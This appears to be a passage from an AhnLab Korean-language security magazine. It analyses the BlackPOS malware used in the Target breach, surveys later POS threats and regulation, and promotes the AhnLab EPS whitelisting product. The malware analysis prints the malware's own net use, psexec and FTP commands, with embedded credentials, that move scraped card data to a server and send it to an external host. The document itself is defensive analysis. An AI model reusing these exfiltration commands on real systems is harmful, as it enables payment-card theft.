19 신용카드 정보 수집은 POS 관련 프로세스를 찾아 메모리에서 신용카드 정보를 수집한다. 국내에는 메모리 해킹으로 알려진 램 스 크래핑(RAM Scraping) 기법이다. 그러나 실제 해당 POS 프로그램을 확인할 수 없기 때문에 보다 구체적인 테스트를 수행할 수 는 없었다. 신용카드 정보 유출 쓰레드(thread)는 시스템 시간을 확인해 오전 10시 00분부터 오후 5시 59분까지 주요 동작을 수행한다. POS 시스템의 운용 시간과 고객의 신용카드 사용 빈도를 고려한 것으로 보인다. 수집된 신용카드 번호를 담은 winxml.dll 파일을 생성하고 net use 명령을 통해 연계된 서버에 [시스템이름]_[날짜]_[월]_[시간].txt 로 복사한다. net use S: \\10.xxx.xxx.31\c$\WINDOWS\twain_32 /user:ttcopscli3acs\best1_user BackupU$r move C:\WINDOWS\system32\winxml.dll S:\[username]_[day]_[month]_[hour].txt net use S: /del 3. 악성코드 제작 추정 지역 유사 변형 악성코드는 러시아에서 제작된 것으로 알려져 있다. 악성코드 내부에 [그림 3]과 같이 러시아어로 감자 를 의미하는 KAPTOXA 라는 문자열이 포함되어 있다. [그림 3] 러시아어 문자열이 포함된 악성코드 내부 [그림 4]와 같이 SetConsoleCP, SetConsoleOutputCP로 코드 페이지를 변경하는데, 이는 러시아 등에서 사용하는 키릴 문자 인 코딩 값이다. [그림 4] 코드 페이지 변환 후 확인되는 키릴 문자 인코딩 값 그러나 악성코드 소스 등이 공유되었을 수도 있기 때문에 이것만으로 이번 공격에 사용된 악성코드 제작자를 명확하게 지목하기 는 어렵다. 19

20 THREAT REVIEW 서버 감염 악성코드 분석 이번 타겟사 해킹에는 POS 시스템에서 수집된 정보를 모아 외부로 유출하는 악성코드가 존재하며, 이 악성코드는 서버를 감염시 킨 것으로 보인다. 1. 원격 시스템 실행 원격 IP의 프로그램을 실행하는 Psexec로 10.xxx.xxx.31에 접속해 다음과 같은 명령을 내린다. 10.xxx.xxx.31은 타겟사의 내부 사설 IP로 알려져 있으며, POS 시스템 주소로 보인다. psexec /accepteula \\10.xxx.xxx.31 -u ttcopscli3acs\best1_user -p BackupU$r cmd /c taskkill /IM bladelogic.exe /F psexec /accepteula \\10.xxx.xxx.31 -u ttcopscli3acs\best1_user -p BackupU$r -d bladelogic psexec /accepteula \\10.xxx.xxx.31 -u ttcopscli3acs\best1_user -p BackupU$r cmd /c taskkill /IM bladelogic.exe /F 2. 유출 자료 복사 감염된 POS 시스템에서 수집한 정보 파일(twain_32a.dll)을 data_년도_날짜_시간_분.txt 형태로 복사한다. 신용카드 번호를 저 장하고 있는 파일은 변형마다 조금씩 다르다. 유출 자료 복사 예시 move \\10.xxx.xxx.31\NT\twain_32a.dll C:\work\data_2014_1_17_16_47.txt 3. 수집 정보 전송 수집된 정보를 FTP를 통해 외부로 전송하기 위해 ftp 명령을 담은 cmd.txt 파일을 생성한다. 분석 대상 파일의 경우, 199.1xx.2xx.182(미국)으로 접속하며 ID와 암호는 digitalw와 Crysis1089이다. open 199.1xx.2xx.182 digitalw Crysis1089 cd public_html cd cgi-bin bin send data_2014_1_17_16_48.txt (예) quit 20

21 관련 악성코드 변형 안랩 V3 제품군에서는 이 악성코드를 Trojan/Win32.Reedum으로 진단한다. 해당 악성코드와 관련해 지난 2011년 여름에 제작 된 유사 버전이 존재하며, 이후 2013년 초부터 관련 악성코드가 제작되었다. 이들 악성코드는 POS 프로그램 정보를 찾는 기능과 KAPTOXA 문자열을 포함하고 있다. [그림 5] KAPTOXA 문자열이 포함된 악성코드 변형 1. 특정 문자열을 검사하는 변형(2011년 ~ 2013년) 2011년에 발견된 변형은 메모리에서 특정 문자열을 검사하는 프로그램이다. [그림 6] 특정 문자열을 검사하는 악성코드 변형 pdb 정보는 x:\programming\c \ScanMemory\Debug\mmon.pdb 이다. [그림 7] 변형 악성코드의 pdb 정보 2013년 초에 발견된 변형의 pdb 정보를 보면 [그림 8]과 같이 Mmon의 새로운 버전으로 생각할 수 있는 MmonNew라는 문자열 이 포함되어 있다. [그림 8] 2013년 변형 악성코드의 pdb 정보 21

22 THREAT REVIEW 코드 구성상 타겟사 해킹에 사용된 악성코드와 직접적인 연관 관계는 부족하지만 이전부터 프로세스에서 특정 문자열을 찾는 악성 코드의 제작 시도가 있었다는 것을 알 수 있다. 2. Retalix를 노리는 악성코드 변형(2013년 1월) 2013년 1월에 발견된 초기 버전은 POS 프로그램에서 정보를 유출하는 기능을 가지고 있다. Retalix 문자열을 포함하고 있는 것 이 특징으로, 리탤릭스(Retalix)는 대표적인 POS 솔루션 전문업체로 알려져 있다. [그림 9] Retalix 문자열을 포함한 악성코드 변형 타겟사 해킹에 이용된 악성코드는 이 버전에 타겟사 내부 환경에 맞춘 기능이 추가된 것이다. 개인정보를 노리는 집요한 공격에 대한 대책 필요 지금까지 살펴본 바와 같이 공격자들은 신용카드 정보를 탈취하기 위해 POS 시스템을 목표로 맞춤형 악성코드를 제작하여 공격에 사용하였다. 신용카드 사용이 폭증하는 기간인 이른바 블랙 프라이데이(Black Friday)에 맞춰 악성코드가 배포되고 영업 시간인 오 전 10시부터 오후 5시 59분까지 동작하도록 설정되어 있었다. 특히 인터넷에 연결되지 않는 POS 시스템 대신 인터넷 연결이 가능 한 내부 시스템을 통해 탈취한 정보를 외부로 전송하기 위해 공격자는 내부 시스템 장악 후 타겟사가 사용하고 있는 POS 시스템을 분석하고 FTP를 통해 실시간으로 탈취한 신용카드 정보를 외부로 전송했다. 이번 타겟사의 사례와 같이 앞으로 신용카드 정보를 비롯해 개인정보를 보관하는 기업에 대한 공격이 더욱 집요해질 것으로 보인 다. 대부분의 기업이 다양한 개인정보를 보관하고 있는 만큼 개인정보보호를 위한 조치가 시급하다. 특히 이번 사례에서 볼 수 있듯 이 외부 침입뿐 아니라 내부 장악을 통해 확산되는 악성코드 및 공격에 대해서도 대책 마련이 필요하다. 22

23 한동안 뜸했던 POS 위협, 빈틈 을 파고들다 THREAT REVIEW 가본 적도 없는 곳에서 신용카드로 200만원이나 결제되었다?! 신용카드를 빌려준 적도, 카드를 분실한 적도 없다. 도대체 이게 어떻게 된 일인가? 카드사와 경찰에 신고했더니 평소 자주 가던 회사 근처 음식점의 신용카드 결제 단말기(POS)가 해킹되어 카드가 복제되었다는 것이다. 게다가 같은 음식점을 이용하던 몇몇 사람들도 똑같은 피해를 입었다고 한다. 말로만 듣던 불법복제카드와 POS 해킹의 피해자가 바로 내가 될 줄이야. 지난 2013년 말, POS 시스템 해킹으로 인한 대규모 신용카드 정 보 유출 사건이 발생한 이후 잠잠해진 것 같던 POS 해킹 사건이 또 다시 발생했다. 지난 7월 초, 인천 지역에서 실제 사용자가 알 지 못하는 사이에 신용카드로 거액이 결제되는 피해가 잇따라 발 생한 것이다. 피해자들은 모두 신용카드를 분실한 적이 없었다. 카 드사와 경찰은 일부 피해자가 특정 음식점에서 신용카드를 사용했 다는 점으로 미루어 해당 음식점의 신용카드 결제용 POS(Pointof-Sales) 단말기가 해킹된 것으로 판단하고 있다. 한편 해외에서 도 최근 POS 시스템을 노리는 신종 악성코드가 잇따라 발견되는 등 POS 해킹이 다시 거세질 조짐을 보이고 있다. [그림 1] POS 단말기 해킹 언론 보도 (*출처: KBS 뉴스광장, 2015년 7월) 23

24 THREAT REVIEW POS 보안 대응책 마련 잰 걸음, 실효성은 글쎄 금융감독원(이하금감원)과 신용카드 결제 단말기 IC전환 태스크포스(TF) 가 지난 7월 1일 POS단말기 보안표준 규격안 을 발표했 다. 2015년 3월부터 약 4개월에 걸쳐 논의된 POS단말기 보안표준은 물리적 해킹 시도 시 POS 단말기 메모리 자동 파괴 정보 유출 차단을 위한 엔드투엔드(End-to-End) 방식의 전체 암호화 등을 골자로 하고 있다. 금감원은 또한 여신금융협회와 함께 여신전문금융업법(이하 여전법) 을 개정해 신용카드 결제대행업체(Value Added Network, 이하 VAN) 등록제도 병행하고 있다. 이에 따라 지난 7월 21일부터 신규 가맹점 및 신규 POS 단말기 설치 시 보안표준에 따라 제작 여신전문금융업법 개정 POS단말기 보안표준 규격안 대응책 실효성에 의구심 되어 인증에 통과한 단말기만 설치 및 사용해야 하며, 이를 어길 시 VAN사 와 가맹점에 5천만 원 이하의 과징금이 부과된다. 단, 기존 가맹점들의 POS 단말기에 대해서는 3년의 유예기간을 두고 신규 단말기로 교체할 것을 유 도하고 있다. 그러나 기존 가맹점에서도 POS 단말기 고장 등이 발생했을 경우에는 무조건 신규 단말기로 교체해야 한다. 문제는 비용 부담이 만만치 않아 영세한 가맹점의 경우 신규 POS 단말기 도입 또는 교체가 쉽지 않다 는 점이다. 또한 이른바 전자칩(IC) 단말기 전환 사업자로 선정된 VAN사 세 곳 중 두 곳은 아직 단말기 인증을 받지 못한 상황이라 신규 단말기 공급 물량이 부족하다는 지적도 있다. 앞서 언급한 POS 단말기 를 이용한 카드 불법복제 사건도 공교롭게도 금감원이 POS 단말기 보안표준을 발표한 이후 발생했다. 금융 당국이 마련한 신용카 드 및 POS 해킹 사고 방지 대응책에 대해 실효성 측면에서 의구심을 떨치기 어려운 이유다. 게다가 국내외에서 진화된 형태의 POS 악성코드가 계속 발견되고 있어 POS 보안 위협은 쉽게 해결되지 않을 것으로 보인다. POS 위협, 악성코드의 진화 vs 태생적 위협 POS 악성코드가 전세계적으로 주목을 끌게 된 계기는 지난 2013년 12월 발생한 미국 대형 유통업체 타겟(Target)사 해킹 사건이 다. 약 4천만 건의 신용카드 정보를 탈취하고 7천만 명에 달하는 피해자를 기록한 타겟사의 POS 시스템 해킹에 사용된 악성코드 는 블랙 POS(BlackPOS) 로 알려졌다. 주요 POS 악성코드 추이 (2009~2014) 24

25 지난 6월에 발견된 말럼POS 악성코드는 오라클의 POS 시스템 운영 플랫폼인 마이크로스(MICROS) 에서 카드 소유자의 이름과 카드 번호를 탈취하는 것으로 알려져있다. 마이크로스는 전세계 33만여 고객사의 POS 플랫폼으로 제공되어 있어 잠재적인 피해 가 우려되고 있다. POS 악성코드는 국내에서도 심심치 않게 발견되고 있다. 대표적으로 지난 2014년 초 Ompos 라는 악성코드를 이용해 POS 시스 템 관리 업체의 서버를 해킹한 후 POS 시스템을 감염시켜 신용카드 정보를 노린 사례가 있다. 악성코드뿐만 아니라 POS 시스템의 특수성도 핵심적인 위협 요인이라 할 수 있다. POS 시스템의 태생적 위협 요인으로는 다양한 네트워크 연결 부적절한 POS 단말기 이용 행태 애플리케이션 취약점 등을 들 수 있다. POS 시스템의 태생적 위협 요인 대부분의 POS 시스템은 폐쇄망이 아닌 일반적인 상용 인터넷망을 사용하고 있다. 일부 대형 유통업 체는 POS 시스템과 지불 승인 네트워크를 별도의 전용선으로 운용하지만 수많은 중소 규모의 업체나 영세 가맹점의 경우에는 상용 인터넷을 통해 POS 시스템을 연결하여 지불 승인을 하고 있다. 게다가 최근 POS 시스템은 고객 정보, 포인트 정보 등 다양한 고객 관리 정보와의 연계 등을 위해 다른 네트 워크와 연결하는 경우도 많다. 이러한 네트워크 연결 환경에서는 보안에 취약한 지점이 존재할 수 밖 에 없으며, 만일 무선인터넷을 이용하는 경우라면 네트워크를 통한 공격의 가능성이 더욱 높아진다. 다양한 네트워크 연결 가맹점 주인 또는 직원들이 POS 단말기를 이용해 개인 PC를 사용하듯 온라인 쇼핑이나 SNS 등 인터 넷 이용을 하는 경우가 많다는 점도 문제다. 이처럼 부적절한 POS 시스템 사용으로 인해 악성코드 감 염에 노출되기 쉽다. 또한 필요에 따라 원격 제어 프로그램, 인터넷 익스플로러, 어도비 리더, 마이크로소프트 오피스 등 다 부적절한 이용 양한 애플리케이션을 POS 시스템에 설치하기도 한다. 이 경우 웹 브라우저, PDF/DOC 등 문서 프로그 램, 자바(JAVA) 등의 취약점을 이용한 악성코드 유입과 같은 일반적인 PC 환경에서의 보안 위협이 고스 란히 존재한다. 이 밖에도 비용 부담 등으로 인해 POS 시스템을 저사양 PC나 오래된 운영체제에 POS 프로그램을 설치 및 운용하는 경우가 많다는 점도 위협 요인이다. 특히 일부 가맹점의 POS 단말기는 서비스가 종료된 윈도 XP(Windows XP) 및 윈도 XP를 기반으로 한 WEPOS(Windows Embedded 애플리케이션 취약점 for Point of Service), 윈도 임베디드 POSReady 2009(Windows Embedded POSReady 2009)를 운영체제로 사용하고 있어 보안에 매우 취약하다. 이처럼 대부분의 POS 시스템은 악성코드를 비롯해 환경적 특수성에 의해 다양한 위협에 노출되어 있다. 금융 당국의 주도로 전체 암호화 등 보안 기술이 적용된 IC 단말기로의 교체가 진행되고는 있지만 모든 POS 단말기를 신규 단말기로 교체 완료하기까지는 상당 시일이 걸릴 것으로 예상돼 POS 시스템은 여전히 보안에 취약한 상태다. 그렇다고 손 놓고 있을 수도 없는 일. 현재 가능한 방법으로는 백신(Anti-virus)을 사용하거나 데이터 암호화 및 암호 통신을 적용하 는 것인데, 이미 악성코드에 감염된 POS 시스템일 경우 데이터 암호화나 암호 통신은 무의미하다. 또한 백신은 신종 악성코드 대응 에는 적합하지 않으며 저사양 시스템이나 네트워크 속도가 제한적인 환경에서 운용되는 POS 시스템의 경우, 시그니처 업데이트가 필요한 백신 프로그램으로 인한 리소스 문제가 발생할 수 있다. 상황이 이렇다 보니 POS 시스템의 특수한 환경적 요인과 최신 POS 위협을 다각도로 고려한 보안 솔루션에 대한 요구가 늘고 있다. 25

26 해커의 시선, POS 시스템으로 향한다 SPECIAL REPORT POS 시스템 보안 위협과 AhnLab EPS 2013년 블랙 프라이데이 시즌에 발생한 미국의 대형 유통업체인 타겟(Target)사의 신용카드 정보와 개인정보 유출 사건이 세계를 깜짝 놀라게 했다. 주변에서 흔히 사용하는 결제 시스템 정도로만 여겼던 POS 시스템이 해커의 공격 대상이 되었고, 2300억 원이라는 막대한 금전적 피해가 발생했다. 그 동안 보안 전문가들의 경고에도 불구하고 간과 했던 POS 시스템의 보안 위협이 현실화된 것이다. 사실 POS 시스템을 노린 해킹 사고가 발생한 것은 어제오늘 일이 아니다. 2009년 처음 트래커 악성코드가 발견된 후 해마다 POS 악성코드는 증가하고 있다. 반면, POS 시스템 환경 에 맞는 보안 체계와 보안 솔루션 적용은 미흡한 상태이다. 이 글에서는 POS 시스템이 가지고 있는 특수 환경과 이를 노리는 보안 위협에 대해 알아본다. 그리고 이에 대한 보안 대응 방안으로 안랩의 POS 시스템 전용 보안 솔루션인 AhnLab EPS에 대해 자세히 살펴보자. 왜 POS 시스템을 노리는가 안랩은 매년 발표하는 올해의 보안 위협 트렌드 보고서 에서 POS 시스템 보안 문제 대두 를 예측한 바 있다. 이 보고서에 따르면 올해에는 국내에도 기존 POS 단말기 공격뿐만 아니라, POS 시스템 제작업체 대상 해킹 시도 등의 보다 다양하고 강력한 방식의 POS 시스템 공격 방식이 등장할 것으로 전망했다. POS 시스템의 보안 위협에 대해 본격적으로 논의하기 앞서 POS 시스템이 무엇이며, 왜 해커들이 이 시스템을 겨냥하고 있는지 알아보자. POS(Point of Sales) 시스템은 점포에서 판매와 동시에 품목, 가격, 수량 등의 유통 정보를 컴퓨터에 입력시켜 정보를 분석, 활용하 는 관리 시스템이다. 이를 통해 물품 계산은 물론 수시로 매출 동향을 파악하고 재고를 적정 수준으로 유지하는 등 상품관리에 있어 서 중요한 역할을 담당하는 핵심 시스템이다. 이제는 더 나아가 단순 지불, 회계, 영업상황, 재고 관리 등의 운영 정보 제공뿐 아니라 다양한 포인트와 맴버십 등 고객의 관리까지 사용되고 있다. 특히 최근 몇몇 서비스 제공 업체들은 이러한 POS의 고객 정보와 고객 스마트 기기의 위치 정보, 앱(APP) 사용 데이터 등 다양한 데이터 융합을 통해 고객 편의 및 충성도 개선을 위한 정보를 제공하고 있 으며, 이 분야는 지속적으로 클라우드 연계과 함께 발전해 나갈 것으로 보인다. 26

27 POS 시스템의 운영 방식 (*출처: epson-biz.com) 이렇게 POS 시스템의 활용도가 높아지고 중요 정보를 다루고 있는데 비해 보안 대책은 미흡한 것이 현실이다. 일반적으 로 POS 시스템은 대부분 저사양 컴퓨터에 관련 프로그램이 운용되는 형태다. 보통 POS 시스템은 대부분 메모리 1GB 정 도의 낮은 사양인 데다 보안 프로그램은커녕 윈도 업데이트도 제대로 되지 않는다. 또한 POS 시스템을 본래 목적 외에 인 터넷 검색 등의 용도로 사용하는 경우도 있어 악성코드에 쉽게 노출된다. 결론적으로 해커가 POS 시스템을 노리는 이유 는 명확하다. 보안이 취약한 반면, 가치 있는 중요한 정보를 대량 보유하고 있기 때문이다. POS 시스템의 위협과 현재 대응 방식의 한계 다양한 연결을 통한 네트워크 보 안 위 협 대형 유통 업체에서는 POS 시스템과 지불 승인 네트워크를 별도의 전용선을 이용할 것이다. 하지만 앞서 설명한 것과 같 이 다양한 고객 정보, 포인트 정보 등 고객 관리 정보와의 연계 등을 위해 다른 네트워크와도 연결되고 있다. 중소 규모의 업체나 소매점의 경우에는 공용(public) 인터넷 혹은 셀룰러(Cellular)를 통해 POS 시스템을 연결하여 지불 승인을 하거 나 아예 서비스형 소프트웨어(Software as a Service, SaaS) 형태의 클라우드 기반 POS로 운영하기도 한다. 이와 같은 네트워크 상황에서는 다양한 보안 홀(약점)이 존재할 수밖에 없으며, 특히 무선인터넷과 연결된 상황에서는 더욱 네트워 크를 통한 침투 가능성이 높아진다. 서비스 종료된 운영체제 사용 현재 대부분의 POS 시스템은 운영체제로 서비스가 종료된 마이크로소프트의 윈도 XP(Windows XP) 및 이를 기반으 로 한 WEPOS(Windows Embedded for Point of Service), 윈도 임베디드 POSReady 2009(Windows Embedded POSReady 2009)를 사용하고 있다. 이 윈도 XP 계열의 운영체제는 십여 년 전(2001년) 출시된 운영체제로 수많은 취약 점과 공격 기법이 발견되고 있다. 특히, 이미 서비스가 종료된 운영체제이므로 보안 패치 등의 보안 업데이트 서비스가 더 이상 제공되지 않아 보안에 매우 취약하다. 27

28 SPECIAL REPORT 애플리케이션 취 약 점 POS 시스템은 이러한 범용적인 운영체제뿐 아니라 원격 제어 프로그램, 인터넷 익스플로러, 어도비 리더, 마이크로소프 트 오피스 등 관리 및 편의를 위한 다양한 프로그램도 함께 설치하여 사용하고 있다. 이러한 경우 일반적인 데스크톱 PC와 동일한 취약점에 노출될 수밖에 없다. 웹 브라우저, PDF, DOC 등 문서, 자바(JAVA) 등 취약점을 통한 악성코드의 유입으 로 POS 시스템은 공격자의 손에 넘어갈 수 있다. POS 용도 POS 시스템은 이러한 취약점, 사회공학적인 공격까지 다양한 위협에 노출되어 있으나 현재 단말기의 보안은 안티바이러 이외의인터넷, 외 부 매 체 스 소프트웨어 사용과 데이터의 암호화 및 암호 통신 이외에 특별한 대안이 없다. 악성코드 유입으로 인해 장악된 POS 시 스템에서는 데이터의 암호화나 암호 통신이 무의미해지며, 시그니처 기반인 안티바이러스 소프트웨어는 이미 악성코드 사 용 대응에 약할 수밖에 없다. 물론 저사양의 POS 시스템 특성과 제한된 네트워크 속도 상 꾸준히 시그니처를 업데이트하고 검사하는 안티바이러스 소프트웨어를 설치하고 구동하기 어려운 환경이라는 점도 감안해야 한다. POS 시스템, 일반 PC와 다른 보안 대책 필요 POS 시스템 해킹은 신용/직불카드 정보뿐 아니라 해당 카드를 사용한 고객의 정보, 포인트나 멤버십 정보까지 탈취하며, 이를 통한 카드 복제, 취득 정보의 2차, 3차 거래 등 다양한 범죄에 악용될 수 있다. 이러한 POS 시스템 보안은 일반적인 PC보다 더욱 강력한 보안이 요구되며 다각도의 대책이 필요하다. 우선 POS 시스템의 로그인 암호를 복잡하게 설정하고 주기적으로 변경하고, 가급적 VNC, 원격 데스크톱(Remote Desktop) 등 원격제어 프로그램을 사용하지 않아야 한다. 실제로 2014년 한 포럼이 진행한 프로젝트에서 pos12345, posadmin 과 같이 유추하기 쉬운 비밀번호 설명했다( forces_pos/). 또한 지불 결제에 필요한 네트워크 연결 외에 공용 인터넷과의 연결이나 무선 인터넷(WiFi) 연결 등은 모두 사용하지 않도 록 하며, 인터넷 연결이 부득이하게 필요한 경우에는 방화벽을 이용하여 필요한 연결만 가능하도록 한다. 그리고 직원 교육을 통해 POS 시스템으로 개인적인 인터넷 사용이나 외부 저장매체의 접촉, 문서 작업 등 POS 시스템 운 용에 필요한 프로그램 이외에는 사용하지 않도록 해야 한다. 무엇보다도 가장 중요한 것은 모든 공격의 시작이 되는 악성코드의 유입과 실행을 차단해야 한다. POS와 같은 특수 목적 시스템은 일반적인 PC와 다른 운영 환경으로 구성되어 시스템에 사용되는 애플리케이션은 명확하게 정의되어 있고, 해당 애플리케이션을 이용해 제한된 역할을 수행하게 된다. 하지만 현재 이러한 특수 환경의 시스템도 일반 PC용 운영체제를 기반으로 하고 있어 다양한 보안 위협에 노출되어 있으며, 일반 PC와 동일한 보안 체계를 사용하고 있다. 즉 POS 시스템 은 해당 목적에 맞는 필요한 프로그램과 리소스만 사용하는 등 제한적인 환경 구성이 필요하여, 일반 PC에 사용하는 안티 바이러스 소프트웨어를 사용하는 것으로는 타깃 공격이나 고도화된 공격을 차단하기 어렵다. 또한 안티바이러스 소프트 웨어는 주기적인 시그니처의 업데이트와 디스크 검사 등을 수행해야 하므로 저사양 시스템으로 운용하는 POS 시스템에 과부하를 주어 결제 지연 및 통신 장애 등을 유발할 수 있다. 28

29 최근 이러한 이유로 POS 시스템의 보안으로 애플리케이션 콘트롤 제품이 논의되고 있으나, 이 제품은 관리자의 전문적인 지식을 바탕으로 고도의 애플리케이션 사용/차단 정책 관리가 필요하며, 보안 제품이 아닌 관리 제품이기에 악성코드 침입 및 감염 여부 등 위협을 탐지하고 판단하여 대응하기에 보안 전문가의 관리가 필요하다. 하지만 중소상점의 점주들이 이러한 보안적 관리를 할 수 있는 경우는 거의 없으므로 애플리케이션 콘트롤 제품은 도입하더라도 관리되지 못할 것이다. 일반 사무용 PC와 POS 시스템 환경 차이 POS 시스템 전용 보안 솔루션, AhnLab EPS AhnLab EPS(Endpoint Protection System)는 POS 같은 특수한 목적의 엔드포인트 시스템(fixed function devices)을 위한 전 용 보안 솔루션으로 시스템의 안정적 운용에 대한 민감도가 높고 정해진 프로그램만 사용하는 자동화기기 및 제어용 시스템 등에 최적화된 전용 보안 솔루션이다. 고도의 전문적인 관리가 필요한 애플리케이션 콘트롤(Application Control)과 달리 지능적인 화이트리스트(WhiteList) 기반으로 운영 시스템에 필요한 프로그램의 실행과 네트워크 연결, 시스템 자원만 사용 가능하게 한다. 이로 인해 불필요한 또는 비용도적 (POS와 관련 없는) 프로그램의 실행을 차단하여, 악성코드의 유입과 악성코드의 활동을 억제할 수 있다. 29

30 SPECIAL REPORT AhnLab EPS의 주요 기능은 다음과 같다. 강력한 악성코드 탐지 및 확산 방지 기능 서버에 보유한 악성코드 탐지 치료 엔진을 통한 에이전트의 악성코드 탐지 및 확산 방지 IP, 포트 차단 및 외부 저장장치 자동 실행 방지를 통한 감염 경로 차단 OS 패치 업데이트 적용 여부와 관련 없는 보안성 확보 비업무 프로그램 행위 및 불필요한 매체 차단 허가된 애플리케이션 및 네트워크 연결만 사용할 수 있도록 관리 저장 매체 등 매체 제어를 통한 비업무적 매체 연결 원천 차단 초경량 보안 및 통제 솔루션 에이전트가 설치되는 제어 시스템의 메모리, CPU 점유율 최소화 모든 자원 소모 작업은 별도의 서버에서 수행 중앙 집중식 관리 시스템 대시보드를 통한 모든 에이전트 관리 포인트 단일화 에이전트 그룹 기능을 통한 빠른 접근 에이전트 미설치 기기 검색, 원격 통한 시스템 확인/점검 중요 알림 및 통합 로그 관리 AhnLab EPS는 독자적인 화이트리스트 방식의 애플리케이션 제어 기능으로 전문적인 보안 지식 없이도 운용이 가능하며, 중앙 관 리를 통해 가맹점의 운용 부담을 덜어준다. 또한 AhnLab EPS 서버의 악성코드 분석 엔진을 통해 단말 시스템에 대해 백신 등의 주기적 업데이트와 이로 인한 네트워크 및 시스 템 자원 점유없이 악성코드를 탐지하고 차단할 수 있다. 특히 시스템 자체의 자원을 거의 사용하지 않고도 시스템에 생성되는 모든 실행 파일에 대한 실시간 검사와 분석을 수행할 수 있다. 이를 통해 POS 시스템 단말의 악성코드 대응과 알려지지 않은(Unknown) 위협의 분석까지 수행이 가능하여 별도의 안티바이러스 솔루션을 추가로 구매/설치할 필요가 없다. 30

31 AhnLab EPS는 강력한 락다운(Lockdown) 기능으로 POS 시스템 운용에 필요 없는 애플리케이션 및 시스템 기능과 매체 네트워 크 연결 통제 기술을 통해 모든 POS 시스템이 외부의 공격과 알려지지 않은 위협으로부터 항상 안전한 상태로 유지할 수 있게 해 준다. 또한 서버에서 제공하는 악성코드 탐지 및 분석 기능과 보안 정책 관리를 통해 모든 시스템이 언제나 안전한 파일들로 구성되 고 운영될 수 있도록 유지하고 보호한다. 즉, 사전 차단 및 보호를 통해 POS 시스템의 운용에 중점을 두고, 그 뒷단의 탐지 및 대응 을 통해 추가적인 보안 정책 강화 등이 가능하다. 이 밖에도 정상 명령 메시지 여부 검증 원격 클라이언트 및 뷰어에 대한 무결성 검증 등 원격 관리 기능을 통해 적게는 수십, 많 게는 수천 대에 달하는 특수 목적 시스템을 중앙에서 효과적으로 관리할 수 있다는 것이 AhnLab EPS의 강점이다. 이렇듯 AhnLab EPS는 특수 목적 시스템 전용 보안 솔루션으로 해당 시스템의 리소스와 관련 업무 프로세스에 영향 없이 사전적인 악성코드 차단과 통제가 가능하고 이를 통해 정보 유출 방지와 생산성 향상, 관리 및 운용 비용 절감 효과를 거둘 수 있다. AhnLab EPS는 다이소, 신세계 등 대형 유통 업체의 POS 시스템에 적용되어 성능과 안정성 측면에서 이미 검증된 제품이다. 또한 POS 시스템뿐만 아니라 반도체 및 가전 생산 라인, 산업 설비 제어, 키오스크(KIOSK), ATM 등 다양한 분야에 전용 보안 솔루션으 로 운용되고 있다. 31

32 보안성 과 안정적인 운영 모두 잡았다! CASE STUDY 유통기업 A 그룹 AhnLab EPS 도입 사례 2013년 말, 공교롭게도 비슷한 시기에 한국과 미국에서 POS 시스템 해킹으로 인한 대규모 개인정보 유출 사건이 발생했다. 이후에도 세계 곳곳에서 크고 작은 POS 시스템 보안 침해 사건이 이어지고 있다. 수년 전부터 보안 전문가들이 경고해왔던 POS 시스템 보안 위협이 현실화되고 있는 것이다. 이처럼 POS 보안 위협이 국내외에서 이슈가 되고 있는 가운데, 국내 유명 유통기업인 A사가 대형마트, 백화점, 커피전문점 등 6개 계열사 POS 단말기 보안을 위해 AhnLab EPS를 도입해 눈길을 끌고 있다. POS 시스템 해킹뿐만 아니라 POS 시스템을 노리고 제작된, 이른바 POS 멀웨어가 지속적으로 증가하는 추세다. 또한 마이크로소프트사가 2014년 4월부터 Windows XP 지원을 종료함에 따라 A사는 선제적인 대응이 중요하다고 판 단, POS 전용 보안 솔루션 도입을 서둘렀다. 당시 A사는 대부분의 POS 시스템을 Windows XP 또는 윈도(Windows) 기 반의 임베디드(Embedded) OS를 운영체제로 사용하는 단말기에서 운용하고 있었기 때문이다. POS 시스템 보안 솔루션 선정에 있어 A사가 가장 중점을 둔 것은 보안성 과 POS 시스템의 특성 및 운용에 대한 보 안 업체의 이해 다. 악성코드 대응을 위해 안티바이러스 솔루션 도입을 검토했지만, 이 경우 지속적인 시그니처 업데 이트가 필요하기 때문에 POS 단말기의 리소스 가용성이 떨어질 수 있다는 점이 걸림돌이었다. POS 단말기는 결제가 이루어지는 지점으로, POS 시스템 운영은 각 매장의 매상과 직접적인 관련이 있다고 해도 과언이 아니다. 통상적으로 POS 시스템은 저사양 단말기에서 운용되기 때문에 안정적인 시스템 운용이 가장 중요한 요소다. 특 히 POS 단말기가 낮은 네트워크 대역폭 환경에서 운용되는 경우, 제품의 패치 및 엔진 업데이트 시 발생하는 트래픽도 시 스템 운용에 방해가 될 수 있다. 악성코드 차단뿐만 아니라 POS 단말기가 원래의 목적으로만 안정적으로 운용될 수 있도 록 불필요한 프로그램이나 웹 서핑 등 네트워크 이용을 제한하는 것도 A사의 고민이었다. 그렇다고 하드웨어 사양이 한정 되어 있는 POS 단말기에 여러 가지 보안 솔루션을 적용할 수도 없는 노릇. A사는 오랜 검토 끝에 까다로운 입맛에 딱 맞는 솔루션을 찾아냈다. 바로 AhnLab EPS(Endpoint Protection System)다. 32

33 유통기업 A사의 AhnLab EPS 구성 방식 A사가 AhnLab EPS를 선택한 가장 큰 이유는 이 제품이 블랙리스트와 화이트리스트 기반의 보안 기능을 동시에 제공한다는 점이 다. EPS는 안랩의 악성코드 대응 전문성을 기반으로 강력한 악성코드 억제력은 물론, 독자적인 화이트리스트 기술을 통해 쉽고 간 편하게 허용된 애플리케이션만 사용하도록 제어한다. 네트워크 제어와 USB 등 저장 매체 제어가 가능해 별도의 솔루션을 추가로 도입할 필요가 없다는 점도 장점이다. 안티바이러스 솔루션과 달리 시그니처 업데이트가 필요하지 않고 엔진 크기 또한 거의 변화가 없어 단말의 리소스를 온전히 본래 의 업무에 이용할 수 있으면서도 높은 보안 수준을 유지할 수 있기 때문에 POS 등 특수 목적 시스템 보안에 적합하다. 또한 EPS는 Windows XP를 비롯해 서버용 윈도 OS, 윈도 기반 임베디드 OS 등 다양한 OS를 지원하기 때문에 다양한 비즈니스 환경에 적용 이 용이하다. A사는 무엇보다 각 계열사의 수천 개의 단말을 본사에서 중앙 관리 및 제어할 수 있다는 점을 EPS의 장점으로 꼽았다. 수천 대의 POS 단말 시스템에 대한 해킹 및 악성코드 위협을 모니터링하고, 비인가 소프트웨어의 설치를 비롯해 업무 목적 외 단말 시스템 오 남용 등을 예방함으로써 잠재적인 위협 요소를 제거했다는 것만으로도 A사는 AhnLab EPS 도입에 만족을 표하고 있다. 33

